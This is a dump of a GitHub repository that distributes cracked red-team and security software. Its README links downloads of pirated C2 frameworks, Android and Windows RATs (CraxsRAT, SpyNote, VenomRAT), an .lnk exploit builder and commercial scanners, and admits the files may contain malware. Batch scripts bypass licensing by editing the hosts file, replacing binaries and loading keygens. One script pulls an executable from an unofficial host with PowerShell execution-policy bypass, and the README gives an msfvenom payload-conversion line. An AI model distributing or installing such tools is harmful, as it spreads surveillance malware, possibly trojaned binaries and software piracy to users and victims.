[
  {
    "path": "README.md",
    "content": "# ⚠️ WARNING ⚠️\nAs of 1/27/2024 these tools will not be checked for malware using any sort of environment, you are responsible for any damages done to your computer, run these strictly in a VM environment.<br><br>Make sure to read notes at the bottom before opening any issue.<br>Moved from gofile.io to pixeldrain.com (05/11/2025) - enjoy!\n\n# Cracked Red Teaming Tools.\nThis is a full collection of red teaming tools which have been cracked by other people, if you need me to find anything, let me know via the issues tab.\n<br><br>\n\n### ℹ Sandboxes ℹ\nSandboxing is useful when it comes to testing whether or not the tools contain malware, and it is *strongly* recommended to do so depending on the tool size.\n| Name | Link | Description |\n| :--- | ---- | ---: |\n| AnyRun | [any.run](https://app.any.run/) | A (mostly) free online interactive VM/sandbox, one of the best out there, requires business e-mail, however limited to 5 minutes per sample including a 16MB sample size (Bypassable up to 100-300MB) for free tier accounts |\n| TRIAGE | [tria.ge](https://tria.ge/) | A completely free online interactive VM/sandbox, less informative compared to AnyRun, however it needs just a singular log in using any email or even GitHub, with up to a 30-minute sample time limit and no sample size limit. |\n| HybridAnalysis | [hybrid-analysis.com](https://hybrid-analysis.com/) | A completely (login-)free online sandbox, unlike the others it is not interactive, has a 100MB file size limit and has a very long queue to get your file analyzed. |\n| JoeSandbox | [joesandbox.com](https://www.joesandbox.com/) | Appears to be a fully interactive online VM/sandbox with a 100MB file size limit, however I have never personally used it. |\n| CUCKOO | [cuckoo.cert.ee](https://cuckoo.cert.ee/) | A non-interactive completely (login-)free online sandbox, appears to have no file size limit and I have rarely used it personally. |\n\n### 🐀 C2/RATs 🐀\n##### Windows/Linux (W - Windows , L - Linux)\n| Tool | Link |\n| :--- | ---: |\n| [W/L] Cobalt Strike v4.9.1 | [Download](https://gofile.io/d/U25hhJ) |\n| [L] Brute-Ratel v1.4.5 (Blitzkrieg) | [Missing File](https://github.com/ixve/red-team-tools/) |\n| [W] SpecterInsightC2 | [Download](https://pixeldrain.com/u/WyYAazhY) |\n| [W] VenomRAT v6.0.1 | [Download](https://pixeldrain.com/u/xVXeWbWb) |\n\n##### Android\n| Tool | Link |\n| :--- | ---: |\n| CraxsRAT v6? (⚠️ **READ NOTES** ⚠️) | [Download](https://pixeldrain.com/u/e3MdYXM7) |\n| SpyNote v7.3.1 (❓ **READ NOTES** ❓) | [DOWN - Updated link may not come]() |\n\n<br><br>\n### 🎭 Exploitation Toolkits/Software 🎭\n###### Windows\n| Tool | Link |\n| :--- | ---: |\n| Immunity CANVAS v7.27 | [Download](https://pixeldrain.com/u/u8SeCmNe) |\n| Quantum .lnk Exploit Builder (02-10-22) | [Download](https://pixeldrain.com/u/9zjpYNQn) |\n| JexBot v1.0 (READ NOTES) | [Download](https://pixeldrain.com/u/Ea8kF2Hh) |\n| MetaSploit Pro | [Download](https://pixeldrain.com/u/u12Nsuzm) |\n\n###### Linux\n| Tool | Link |\n| :--- | ---: |\n| MetaSploit Pro | [Download](https://pixeldrain.com/u/xS54Uxwa) |\n\n<br><br>\n### 🌐 Web App Security Tools 🌐\n##### Windows\n| Tool | Link |\n| :--- | ---: |\n| Invicti Pro v25.5 | [Download](https://pixeldrain.com/u/qZyTDWMc) |\n| Burp Suite PRO v2023.12.1 ([Install Script](https://github.com/Ixve/Red-Team-Tools/blob/main/burpsuite_installer_windows.bat)) | [Download](https://pixeldrain.com/u/rWEidrKW) |\n| Acunetix v25.1.250204093 ([Install Script](https://github.com/Ixve/Red-Team-Tools/blob/main/acunetix_installer_windows.bat)) | [Download](https://pixeldrain.com/u/xTAiTMEg) |\n| Xray Pro v1.9.11 | [Download](https://pixeldrain.com/u/nHdXB2Uk) |\n| Super-Xray v1.7 | [Download](https://pixeldrain.com/u/GWa47ATW)\n| HCL AppScan Standard v10.6.0.28408 | [Download](https://pixeldrain.com/u/dq6kxyik) |\n| Nessus Professional v10.6.0 | [Download](https://pixeldrain.com/u/afUHRhXF) |\n\n##### Linux\n| Tool | Link |\n| :--- | ---: |\n| Acunetix v25.1.250204093 | [Download](https://pixeldrain.com/u/CaagbhPL) |\n| Xray Pro v1.9.11 | [Download](https://pixeldrain.com/u/4m3c84ht) |\n| Nessus Professional v10.5.4 | [Download (BASH SCRIPT)](https://cyberarsenal.org/zen/nessus_debian_only_not_for_ubuntu_latest.sh) |\n\n<br><br>\n### 🕷️ Debugging / Decompilation Tools 🕷️\n| Tool | Link |\n| :--- | ---: |\n| IDA v9.1_250226 Keygen | [Download](https://gofile.io/d/MOgQCb) |\n\n<br><br>\n# 📝 Notes 📝\n###### General\nMost of these tools are obtained from [CyberArsenal](https://cyberarsenal.org/) and [xss.is](https://xss.is/), credits for the cracks go to them.\n\nEverything is re-uploaded to gofile.io due to speed issues with the pwn3rzs CDN (presumably overloaded), including the removal of archive passwords (unless I suspect there is malware, in which case they're password protected)\n\n\n###### Brute-Ratel\nThis version is fully untested - no idea if it is broken or not.\n\nThe xmodlib file is cleared every start-up, including a license check being present every time you start Brute-Ratel.\n\nAgain, if it fails to compile the `badger.bin` payload into a executable, run the following: <br>\n`cat badger.bin | msfvenom -p - -f exe --platform win -a x64 -o badger.exe`\n\n\n###### CraxsRat V6(?)\nHigh possibility of malware, run **strictly** in a virtual environment. I am not responsible for any damages caused to your host machine if you run it outside a VM.\n\nArchive password: `suspicious`\n\n\n###### JexBot\n1. Run `add_hosts.bat` **as Administrator**\n2. Run `Jex_crack.exe` then `JEX BOT.exe`\n3. Put `mastercho` as the user/password combo\n\nNote: After logging into jexbot you can close `Jex_crack.exe`, however you will need to run `Jex_crack.exe` every time you want to run jexbot.\n\n\n###### Acunetix / Burp Suite\nThe install scripts are untested for the latest versions. If required, open a issue and I'll update the scripts.\n\n\n###### SpyNote\nI may not be re-uploading SpyNote due to it's **extreme** sketchiness.<br>\nI will *not* be responsible for possible machine infections due to uneducated users running mindlessly.<br>\nIf you wish to contribute a safe, updated link, feel free to open an issue.\n\n\n###### Xray\nFor Windows:<br>\nOpen a command prompt (or powershell if you prefer that), run scans as follows:<br>\n`xray.exe ws --browser http://testphp.vulnweb.com --json-output testphp.json --html-output testphp.html`\n\nFor Linux:<br>\nOpen a terminal, run scans as follows:<br>\n`./xray ws --browser http://testphp.vulnweb.com --html-output testphp.html`\n\nWithout rad/chrome:\n`./xray ws --basic http://testphp.vulnweb.com --html-output testphp.html`\n\nMissing Chrome \"fix\" (for using xray+rad): <br>\n`sudo apt update` <br>\n`wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb` <br>\n`sudo apt install ./google-chrome-stable_current_amd64.deb` <br>\n Go to the launch script to insert `--no-sandbox` (e.g. `/opt/google/chrome/google-chrome`) <br>\n Last line of the file should look like this: <br>\n`exec -a \"$0\" \"$HERE/chrome\" --no-sandbox \"$@\"`\n\n\n###### Invicti Professional\n1. Import the registry file so the knowledgebase properly renders<br>\n2. Run `NetSparker.exe`<br>\n3. Optional: Disable telemetry, system proxy, enable dark mode, etc\n\n\n###### HCL AppScan Standard\n**Make sure to replace the DLLs with the cracked ones**\n\n\n\n\n###### To be added:\n- de4dot (pre-compiled)\n- AppSpider Full\n- HTTP Debugger Pro\n- Glasswire Elite\n- Anything suggested in the issues tab (Nothing, for now)\n"
  },
  {
    "path": "acunetix_installer_windows.bat",
    "content": "@REM Acunetix Windows installer script made by ixve for Red-Team-Tools\necho off\ncls\n\ncls\necho.&&echo.\necho ^[0^/7^] Checking for Administrator rights...\nmkdir \"%windir%\\system32\\test\" 1>nul2>nul\nif \"%errorlevel%\" == \"0\" (\nrmdir \"%windir%\\system32\\test\" & echo User is Administrator, continuing\n) else (\necho User is not Administrator, please re-run script as admin. && pause && exit /b 1\n)\n\ncls\necho.&&echo.\necho ^[1^/7^] Adding entries to hosts file\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo 127.0.0.1  erp.acunetix.com\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo 127.0.0.1  erp.acunetix.com.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo ::1  erp.acunetix.com\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo ::1  erp.acunetix.com.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo 127.0.0.1  discovery-service.invicti.com\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo 127.0.0.1  discovery-service.invicti.com.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo ::1  discovery-service.invicti.com\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo ::1  discovery-service.invicti.com.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo 127.0.0.1  cdn.pendo.io\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo 127.0.0.1  cdn.pendo.io.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo ::1  cdn.pendo.io\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo ::1  cdn.pendo.io.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo 127.0.0.1  bxss.me\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo 127.0.0.1  bxss.me.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo ::1  bxss.me\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo ::1  bxss.me.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo 127.0.0.1  jwtsigner.invicti.com\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo 127.0.0.1  jwtsigner.invicti.com.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo ::1  jwtsigner.invicti.com\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo ::1  jwtsigner.invicti.com.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo 127.0.0.1  sca.acunetix.com\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo 127.0.0.1  sca.acunetix.com.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo ::1  sca.acunetix.com\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo ::1  sca.acunetix.com.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo 192.178.49.174  telemetry.invicti.com\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo 192.178.49.174  telemetry.invicti.com.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo 2607:f8b0:402a:80a::200e  telemetry.invicti.com\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo 2607:f8b0:402a:80a::200e  telemetry.invicti.com.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo.\n\ncls\necho.&&echo.\necho ^[2^/7^] Running Acunetix installer, please make sure to install to the default directory.\nstart /wait acunetix_25.8.250820089.exe 1>nul2>nul\n\ncls\necho.&&echo.\necho ^[3^/7^] Stopping Acunetix services\nnet stop \"Acunetix\" 1>nul2>nul\nnet stop \"Acunetix Database\" 1>nul2>nul\n\ncls\necho.&&echo.\necho ^[4^/7^] Removing wvsc file in default Acunetix install directory\ndel \"C:\\Program Files (x86)\\Acunetix\\25.8.250820089\\wvsc.exe\" 1>nul2>nul\necho Moving patched wvsc file to default Acunetix install directory\nmove wvsc.exe \"C:\\Program Files (x86)\\Acunetix\\25.8.250820089\\\" 1>nul2>nul\n\ncls\necho.&&echo.\necho ^[5^/7^] Removing Acunetix license directory\nrmdir /s /q C:\\ProgramData\\Acunetix\\shared\\license\\ 1>nul2>nul\necho Re-making Acunetix license directory\nmkdir C:\\ProgramData\\Acunetix\\shared\\license 1>nul2>nul\necho Moving license_info.json and wa_data.dat to Acunetix license directory\nmove license_info.json C:\\ProgramData\\Acunetix\\shared\\license\\ 1>nul2>nul\nmove wa_data.dat C:\\ProgramData\\Acunetix\\shared\\license\\ 1>nul2>nul\necho Setting license_info.json and wa_data.dat as read-only\nattrib +r C:\\ProgramData\\Acunetix\\shared\\license\\*.* /s \n\ncls\necho.&&echo.\necho ^[6^/7^] Re-starting Acunetix services\nnet start \"Acunetix\" 1>nul2>nul\nnet start \"Acunetix Database\" 1>nul2>nul\n\ncls\necho.&&echo.\necho ^[7^/7^] Opening Acunetix dashboard\nstart https://127.0.0.1:3443\n\ncls\necho.&&echo.\necho Work complete, enjoy your Acunetix install\ntimeout 5\nexit /b 1\n"
  },
  {
    "path": "burpsuite_installer_windows.bat",
    "content": "echo off\ntitle B.S.I.H.\ncls\necho Welcome to B.S.I.H. (Burp Suite Install Helper)\necho.\necho.\n\nREM Getting wget.exe using PowerShell \"LOLBAS\" (Alternative to BitsAdmin)\necho Grabbing wget.exe via PowerShell.\npowershell -exec bypass -command \"Import-Module BitsTransfer; Start-BitsTransfer 'https://hyperos-script-store.pages.dev/wget.exe' 'wget.exe'\"\ncls\n\nREM Checking if user has a proper Java version installed\n:javacheck\necho Do you have Java 17+ installed?\necho [1] Yes\necho [2] Check (Attempts to run \"java -version\")\necho [0] No\necho.\nchoice /c 120 /n /m \">> \"\nif %ERRORLEVEL%==1 cls\nif %ERRORLEVEL%==2 cls && start cmd /k \"java -version && pause && exit\" && goto javacheck\nif %ERRORLEVEL%==3 (\ncls\necho Downloading OpenJDK 21\nwget.exe --no-check-certificate -q --show-progress -O OpenJDK.msi \"https://github.com/adoptium/temurin21-binaries/releases/download/jdk-21.0.2+13/OpenJDK21U-jdk_x64_windows_hotspot_21.0.2_13.msi\"\necho.\necho Installing OpenJDK\nmsiexec /i OpenJDK.msi /qb! /l*v openjdk_install.log\necho Done\n)\ncls\n\nREM Grabbing Burp Suite from the official servers and installing with unattended mode\necho Downloading Burp Suite\nwget.exe --no-check-certificate -q --show-progress -O BurpSuiteInstaller.exe \"https://portswigger-cdn.net/burp/releases/download?product=pro&version=2023.12.1&type=WindowsX64\"\necho.\necho Running installer\nBurpSuiteInstaller.exe -q -dir 'C:\\Program Files\\' -overwrite -nofilefailures -splash \"Burp Suite Installer\" -console\n\nREM Moving and running keygen\ncls\necho Copying BurpLoaderKeygen.jar to installed folder\ncopy BurpLoaderKeygen\\BurpLoaderKeygen.jar \"C:\\Program Files\\BurpSuitePro\\\" 1>nul2>nul\necho Running BurpLoaderKeygen.jar\nstart java -jar \"C:\\Program Files\\BurpSuitePro\\BurpLoaderKeygen.jar\"\n\nREM User interaction required\ncls\necho.\necho.\n\nREM The blob below is just a warning sign, you can print it yourself in a seperate batch file if you don't trust me\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^!^!^!^!^!^!^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^:^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_\necho ^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_                                                                \necho.\necho.\necho User interaction is required from this point on\necho You will be guided from the console on what you have to do\npause\npause\ncls\necho.\necho.\necho.\necho 1. Run Burp Suite from the keygen by pressing the Run button\necho.\necho 2. Agree to the Burp Suite license agreement\necho.\necho 3. Copy the license from the keygen and paste it into the license text box located inside Burp Suite and press next\necho.\necho 4. Locate and press \"Manual Activation\", then press \"Copy Request\"\necho.\necho 5. Tab back into the keygen and paste the request into the text box on the right side\necho.\necho 6. Copy the activation resposne back into Burp Suite, then press Next -^> Finish -^> Next -^> Start Burp\necho.\necho 7. Enjoy.\necho.\necho.\npause\n\nREM Add a starter to the Destkpo\necho ^\"C:\\Program Files\\BurpSuitePro\\jre\\bin\\java.exe^\" \"--add-opens=java.desktop/javax.swing=ALL-UNNAMED\" \"--add-opens=java.base/java.lang=ALL-UNNAMED\" \"--add-opens=java.base/jdk.internal.org.objectweb.asm=ALL-UNNAMED\" \"--add-opens=java.base/jdk.internal.org.objectweb.asm.tree=ALL-UNNAMED\" \"--add-opens=java.base/jdk.internal.org.objectweb.asm.Opcodes=ALL-UNNAMED\" \"-javaagent:C:/Program Files/BurpSuitePro/BurpLoaderKeygen.jar\" \"-noverify\" \"-jar\" \"C:\\Program Files\\BurpSuitePro\\burpsuite_pro.jar\" > %USERPROFILE%\\Desktop\\StartBurpSuite.bat\n\nREM Removing files that are no longer needed before exitting\necho Deleting extra files\ndel /q /f wget.exe 2>nul\ndel /q /f BurpSuiteInstaller.exe 2>nul\ndel /q /f .wget-hsts 2>nul\ndel /q /f burpsuite_pro_windows-x64_v2023_12_1_error.log 2>nul\n\necho Killing java.exe (BurpKeygenLoader.jar)\ntaskkill /f /im java.exe 1>nul2>nul\n\nREM Finally, exit.\necho Script finished, goodbye.\nexit /b 1\n"
  },
  {
    "path": "hclappscan_installer_windows.bat",
    "content": "@REM Simple HCL AppScan installer - ixve @ github.com/ixve/red-team-tools\necho off\ncls\n\necho.\necho [1/3] Installing HCL AppScan...\nstart /wait \"\" HCL_AppScan.exe /S /v/qn 1>nul 2>nul\n\ncls\necho.\necho [2/3] Killing process...\ntaskkill /F /IM AppScanGUI.exe /T 1>nul 2>nul\n\ncls\necho.\necho [3/3] Patching...\nxcopy /Y /I \"crack\\AppScanSDK.dll\" \"C:\\Program Files (x86)\\HCL\\AppScan Standard\\\" 1>nul 2>nul\nxcopy /Y /I \"crack\\HclLicenseProvider.dll\" \"C:\\Program Files (x86)\\HCL\\AppScan Standard\\\" 1>nul 2>nul\n\necho.&&echo.\necho Crack by Pwn3rzs - Zen\necho Enjoy :3\ntimeout /T 3\nexit\n"
  },
  {
    "path": "specterinsight_installer_windows.bat",
    "content": "@REM SpecterInsight C2 Install Script - ixve @ github.com/ixve/red-team-tools\n\necho off\nsetlocal enabledelayedexpansion\ncls\n\necho.\necho ^[1^/5^] cURL check\n\nwhere curl >nul 2>&1\nif %ERRORLEVEL%==0 (\necho [OK] cURL installed\n) else (\necho.\necho [ERR] cURL missing\nmkdir %TEMP%\\curl\necho [1/3] Downloading...\npowershell -Command \"Invoke-WebRequest -Uri 'https://curl.se/windows/dl-8.17.0_1/curl-8.17.0_1-win64-mingw.zip' -OutFile '%TEMP%\\curl\\curl.zip' -UseBasicParsing\" 1>nul 2>nul\necho [2/3] Extracting...\npowershell -Command \"Expand-Archive -Path '%TEMP%\\curl\\curl.zip' -DestinationPath '%TEMP%\\curl\\' -Force\" 1>nul 2>nul\necho [3/3] Moving...\nxcopy /Y /I \"%TEMP%\\curl\\curl-8.17.0_1-win64-mingw\\bin\\curl.exe\" \"%SYSTEMROOT%\\System32\\\" 1>nul 2>nul\nxcopy /Y /I \"%TEMP%\\curl\\curl-8.17.0_1-win64-mingw\\bin\\curl-ca-bundle.crt\" \"%SYSTEMROOT%\\System32\\\" 1>nul 2>nul\necho [OK] cURL installed\nrmdir /s /q %TEMP%\\curl\\\necho.\n)\n\ncls\necho.\necho ^[2^/5^] Prerequisites check\n\nset POSTGRESQL_FOUND=\nset ASPNET_FOUND=\nset NETRUN_FOUND=\n\nfor /f \"tokens=*\" %%r in ('dotnet --list-runtimes 2^>nul ^| findstr /r /c:\"^Microsoft\\.NETCore\\.App 9\\.0\\.10 \"' ) do (\nset NETRUN_FOUND=1\n)\n\nfor /f \"tokens=*\" %%r in ('dotnet --list-runtimes 2^>nul ^| findstr /i \"Microsoft.AspNetCore.App\"') do (\nset ASPNET_FOUND=1\n)\n\nfor /f \"tokens=*\" %%K in ('reg query \"HKLM\\SOFTWARE\\PostgreSQL\\Installations\" 2^>nul') do (\n    set POSTGRESQL_FOUND=1\n)\n\nif defined NETRUN_FOUND (\necho [OK] .NET Runtime v9.0.10 installed\n) else (\necho.\necho [ERR] .NET Runtime v9.0.10 missing\necho [1/2] Downloading installer...\ncurl -k -L -s -o net-runtime.exe \"https://builds.dotnet.microsoft.com/dotnet/Runtime/9.0.10/dotnet-runtime-9.0.10-win-x64.exe\"\necho [2/2] Installing...\nstart /wait \"\" net-runtime.exe /quiet /norestart\necho [OK] .NET Runtime v9.0.10 installed\necho.\n)\n\nif defined ASPNET_FOUND (\necho [OK] ASP.NET Core installed\n) else (\necho.\necho [ERR] ASP.NET Core missing\necho [1/2] Downloading installer...\ncurl -k -L -s -o aspnet-core.exe \"https://builds.dotnet.microsoft.com/dotnet/aspnetcore/Runtime/9.0.10/aspnetcore-runtime-9.0.10-win-x64.exe\"\necho [2/2] Installing...\nstart /wait \"\" aspnet-core.exe /quiet /norestart\necho [OK] ASP.NET Core installed\necho.\n)\n\nif defined POSTGRESQL_FOUND (\necho [OK] PostgreSQL installed\n) else (\necho.\necho [ERR] PostgreSQL missing\necho [1/2] Downloading installer...\ncurl -k -O -s https://get.enterprisedb.com/postgresql/postgresql-18.0-2-windows-x64.exe\necho [2/2] Installing ^(This might take a while^)...\nstart /wait \"\" postgresql-18.0-2-windows-x64.exe --mode unattended --unattendedmodeui none --superpassword \"postgres\"\necho [OK] PostgreSQL installed\necho.\n)\n\ncls\necho.\necho ^[3^/5^] Cleanup\ndel net-runtime.exe 1>nul 2>nul\ndel aspnet-core.exe 1>nul 2>nul\ndel postgresql-18.0-2-windows-x64.exe 1>nul 2>nul\n\ncls\n\necho.\necho ^[4^/5^] Modifying HOSTS file\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo 127.0.0.1 www.practicalsecurityanalytics.com\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo 127.0.0.1 